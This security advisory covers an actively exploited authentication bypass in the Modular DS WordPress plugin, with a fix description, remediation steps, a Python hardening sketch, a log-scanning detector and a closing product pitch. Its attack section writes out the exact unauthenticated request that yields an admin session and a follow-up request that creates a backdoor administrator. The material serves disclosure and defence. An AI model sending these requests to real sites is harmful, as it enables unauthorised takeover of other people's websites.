CVE-2026-23550: Modular DS Authentication Bypass (CVSS 10.0)
Overview
- CVE: CVE-2026-23550
- Plugin: Modular DS (WordPress connector plugin)
- Affected Versions: All versions up to and including 2.5.1
- Patched Version: 2.5.2
- CVSS: 10.0 (Critical - maximum score)
- Authentication: None required (unauthenticated attack)
- Type: Authentication Bypass / Unauthenticated Privilege Escalation
- Exploited in the Wild: Yes - attacks observed from January 13, 2026
This vulnerability carries the maximum possible CVSS score of 10.0 and has been actively exploited in the wild. Modular DS is a WordPress connector plugin used to integrate sites with the Modular service, with approximately 40,000 active installations. An attacker can obtain administrator access with a single HTTP GET request, and real-world attacks were detected within hours of the vulnerability becoming publicly known.
What Happened
The Modular DS plugin provides a login route at /login/{modular_request} to connect WordPress sites to Modular's services. The route includes a "direct request" mode intended for internal use, but the checks that should have gated entry to that mode were effectively absent.
Specifically, simply including an origin=mo parameter alongside any type parameter in a request was sufficient to bypass the entire authentication layer. The plugin misidentified this combination as a "trusted internal request" and automatically logged the requester in as a WordPress administrator.
What makes this vulnerability particularly dangerous is that it requires zero prior knowledge or credentials, and administrator access can be obtained with a single, trivially simple HTTP request.
How the Attack Works
The attack sequence requires almost no technical skill.
Step 1: GET request to the login API
GET /api/modular-connector/login/?origin=mo&type=any HTTP/1.1
Host: target-wordpress-site.com
This single request completely bypasses the plugin's authentication checks. The value of the type parameter is irrelevant. The server authenticates the attacker as an administrator and issues a session cookie.
Step 2: Create a backdoor administrator account
POST /wp-admin/user-new.php HTTP/1.1
Host: target-wordpress-site.com
Cookie: [session obtained in step 1]
action=createuser&user_login=backdoor&user_pass=P@ssw0rd&role=administrator
Immediately after obtaining the session, attackers create a new administrator account. This ensures their access persists even if the vulnerable plugin is later removed or patched.
In observed attacks, steps 1 and 2 were completed within minutes of each other, demonstrating that fully automated scripts were driving the exploitation campaign.
Real-World Impact
Starting January 13, 2026, attacks exploiting this vulnerability were confirmed worldwide.
- Approximately 40,000 sites had the vulnerable version of Modular DS installed, making every one of them a potential target
- Attacks were detected within hours of information about the vulnerability spreading — a stark demonstration that CVSS 10.0 vulnerabilities attract immediate automated exploitation
- The typical attacker workflow observed in the wild involved creating an administrator account, planting a backdoor file, injecting spam content, and in some cases installing ransomware
- Many affected site owners did not notice the intrusion immediately, discovering the breach only after some delay
- Because the plugin bypasses authentication entirely, hardened passwords and two-factor authentication provided no protection whatsoever — standard defenses were rendered completely irrelevant
Fix and Lessons
Fix: Patched in version 2.5.2. Validation logic was added to the direct request mode of the /login/{modular_request} route to verify the legitimacy of the request origin. The origin=mo parameter alone is no longer sufficient to trigger authentication bypass, as internal signature or token verification is now enforced.
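To make the design flaw and the fix concrete, here is an added illustration in Python (not the plugin's own PHP code): the flawed trust rule as the advisory describes it, beside a hardened check that requires a signed request. The HMAC scheme, the parameter canonicalisation, the replay window and the shared secret are assumptions for illustration; the advisory does not publish the patched plugin's actual mechanism.

```python
# Added illustration, not code from the Modular DS plugin. The vulnerable rule mirrors
# the advisory's description; the hardened rule is one reasonable shape for "internal
# signature or token verification" and its details are assumptions.
import hashlib
import hmac
import time

SHARED_SECRET = b"constructed-example-secret"  # assumed: provisioned when the site is connected
MAX_SKEW = 300  # seconds a signed request stays valid (assumed replay window)


def is_trusted_vulnerable(params):
    """The flawed rule: origin=mo plus any 'type' parameter marks the request as internal."""
    return params.get("origin") == "mo" and "type" in params


def canonical_query(params, timestamp):
    """Deterministic string covering every parameter plus the timestamp, so nothing can be swapped."""
    return "&".join(f"{k}={params[k]}" for k in sorted(params)) + f"&ts={timestamp}"


def sign_request(params, timestamp, secret=SHARED_SECRET):
    """Service side: HMAC-SHA256 over the canonical query with the shared secret."""
    return hmac.new(secret, canonical_query(params, timestamp).encode(), hashlib.sha256).hexdigest()


def is_trusted_hardened(params, timestamp, signature, now=None, secret=SHARED_SECRET):
    """Plugin side: trust only a fresh request whose signature verifies; the origin value alone proves nothing."""
    now = time.time() if now is None else now
    if abs(now - timestamp) > MAX_SKEW:
        return False  # stale or replayed request
    expected = sign_request(params, timestamp, secret)
    # constant-time comparison avoids leaking the expected digest byte by byte
    return hmac.compare_digest(expected, signature)
```

Any change to a signed parameter (including type) or to the timestamp invalidates the signature, which is the property the origin=mo check never had.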
Immediate actions to take:
- Update Modular DS to version 2.5.2 or later immediately
- Review the WordPress admin user list and remove any unrecognized administrator accounts
- Inspect server access logs for suspicious requests to /api/modular-connector/login/
- Check for backdoor files on the server via FTP or SSH
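For the log review step, the following added Python script (not from the advisory or the Modular DS project) scans combined-format web server access logs for the two-step pattern described above: a GET to the login route carrying origin=mo, followed within a short window by a POST to /wp-admin/user-new.php from the same source address. The log lines, IP addresses and the 30-minute correlation window are constructed assumptions.

```python
# Added detection example; sample log lines below are constructed, not real captures.
import re
from datetime import datetime, timedelta
from urllib.parse import parse_qs, urlsplit

# Apache/nginx combined format up to the status code; referer and user agent may follow.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
LOGIN_ROUTE = "/api/modular-connector/login"
USER_NEW = "/wp-admin/user-new.php"

SAMPLE_LOG = """\
203.0.113.7 - - [13/Jan/2026:04:12:01 +0000] "GET /api/modular-connector/login/?origin=mo&type=any HTTP/1.1" 302 0
203.0.113.7 - - [13/Jan/2026:04:12:09 +0000] "POST /wp-admin/user-new.php HTTP/1.1" 302 0
198.51.100.20 - - [13/Jan/2026:04:15:33 +0000] "GET /api/modular-connector/login/?origin=mo&type=x HTTP/1.1" 302 0
192.0.2.44 - - [13/Jan/2026:05:01:00 +0000] "GET /wp-login.php HTTP/1.1" 200 1234
"""


def parse_line(line):
    """Return a dict with ip, aware timestamp, method, path and status, or None if unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["ts"] = datetime.strptime(entry["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return entry


def is_bypass_probe(entry):
    """GET to the login route whose query string carries origin=mo (the type value is irrelevant)."""
    if entry["method"] != "GET":
        return False
    parts = urlsplit(entry["path"])
    if parts.path.rstrip("/") != LOGIN_ROUTE:
        return False
    return "mo" in parse_qs(parts.query).get("origin", [])


def find_suspicious(lines, window=timedelta(minutes=30)):
    """Map each probing IP to its first probe time and, if seen, the time it created a user."""
    entries = [e for e in map(parse_line, lines) if e]
    findings = {}
    for e in entries:
        if is_bypass_probe(e):
            findings.setdefault(e["ip"], {"probe": e["ts"], "user_created": None})
    for e in entries:
        f = findings.get(e["ip"])
        if f and e["method"] == "POST" and e["path"].startswith(USER_NEW):
            if timedelta(0) <= e["ts"] - f["probe"] <= window and f["user_created"] is None:
                f["user_created"] = e["ts"]
    return findings
```

Run `find_suspicious(open("access.log").read().splitlines())` against a real log; any IP with a non-empty user_created value warrants the admin-account review described above.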
Lessons:
- CVSS 10.0 vulnerabilities are exploited immediately: Automated attacks begin within hours of public disclosure. Patches must be applied the same day they become available
- Authentication bypass invalidates all other defenses: No matter how strong your passwords are, they offer no protection when authentication is skipped entirely
- Trusted-request logic must be rigorous: Special routes for third-party integrations require thorough authentication validation. Relying solely on a query parameter value to determine request trust is a fatal design flaw
- Post-compromise investigation is non-negotiable: Backdoors outlast the deleted plugin. Updating the plugin is necessary but not sufficient — you must also investigate whether the site was already compromised
Detection with Nyambush
Nyambush continuously scans WordPress plugins and their versions, cross-referencing them against CVE databases. If Modular DS version 2.5.1 or earlier is detected, Nyambush immediately raises an alert indicating the critical severity and CVSS score of 10.0.
For vulnerabilities rated CVSS 9.0 and above, the combination of scheduled scans and real-time notifications is essential. When the window between vulnerability disclosure and active exploitation is measured in hours, manual version checks simply cannot keep pace.
When a plugin warning appears in your Nyambush scan results, it is a signal that automated scanners — including those operated by attackers — have already begun probing. Respond to the alert and apply the fix the same day.